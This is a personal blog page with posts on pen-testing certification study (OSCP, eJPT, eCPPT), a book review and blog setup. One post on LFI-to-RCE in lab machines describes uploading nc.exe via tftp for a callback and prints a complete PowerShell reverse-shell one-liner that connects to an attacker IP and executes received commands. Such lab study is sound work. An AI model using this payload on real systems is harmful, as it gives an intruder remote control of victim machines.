1m0va.com

Internet, I have created another blog.  Why?  Because I wanted to play with Jekyll and I have a raspberry pi.  So, I give you, https://www.1m0va.com/.  It was a fun weekend project, and now, I have two blogs, so now I am scattered and have no idea what’s going on other than this life is a garden, and I am having fun.  My thought is to make this blog a personal blog and make 1m0va a Pen Testing blog.  I need to back it up though – having it run on a little San Disk is a bit risky.  Ooooh, challenge accepted 🙂  More fun things to play with!

Starting my eCPPT Journey

INEWork has graciously bestowed on me the gift of the INE Premier Pass.  In there is the PTP course which preps me for the eCPPTv2.  So I am gradually going through it, and I forgot how many slides there are.  The class goes right into assembly, which is fine, but not too much fun.  I hope there are more labs and this gets more fun.  Because I am picking up little nuggets, but not a lot at the moment.

I have a year of the Premier Pass, so I suppose a year to go through the test, and I am going SLOW…. I need more “impact hours” on it.  At least 1 hour a day.  I can do this.  If you are reading this, you can check out my notes.

The Wealthy Gardener

I generally start listening to books, and if the book feels like it’s a wealth of knowledge, then I will buy a hardcopy.  The Wealthy GardenerI did this for The Everyday Hero Manifesto by Robin Sharma, and I did it for this book that I am currently reading, The Wealthy Gardener by John Saforic.  I can see why the criticism to the book in some ways – it follows the “Think and Grow Rich” mantra of the world is working in your favor, but it takes this to that a higher power is working in your favor, if you meet it halfway.  Why not?   I mean, I believe that there is more to life than we yet know, and all I know is my higher power has always been there for me.  Jesus said, “With man this is impossible, but with God all things are possible.”  Also, the lessons in this book about how to grow financially independent all make sense.  I like it, and I think it’s a good book to at least read and think about :).  So how did I come across this book?  Well, I stumbled onto Kristina Karlsson’s podcast through Robin Sharma, she recommended the book, I picked up, and here we are.  Check it out:  https://wealthygardener.com/.  You won’t be disappointed.

Why am I not on Jekyll & Github?

Yes, WordPress is a place for a slew of vulnerabilities and not really seen as a good place to showcase my “technical work” as WP is generally for newcomers and easy-peasy blogging.  Well, one, I am fortifying this blog as much as I can to prevent it from getting hacked and two, I just haven’t learned GitHub yet.  I’ll get there.  Let me work through a few pen testing courses and in due time, I’ll move over.  Rome wasn’t built in a day, everyone.

Countdown to eJPT

10 days till I take the eJPT and I feel pretty confident about it.  I have done the three black boxes at the end of the course and they were a bit tricky, I feel like I have the fundamentals down after studying for the OSCP first.   With the kids at home, work taking priority (gotta put food on the table) and other various things (running, reading, meditating, living life), I am finally at the point where I just need to take the test.  I have heard to not over think it.  I am not sure if I will go back to the OSCP (eCPPT, maybe?), or move on to more relevant certs in my current career path or not.  Either case, I really, really like pen testing and it is really fun.  I am currently pulling through wreath at Try Hack Me and having a blast.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sláinte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.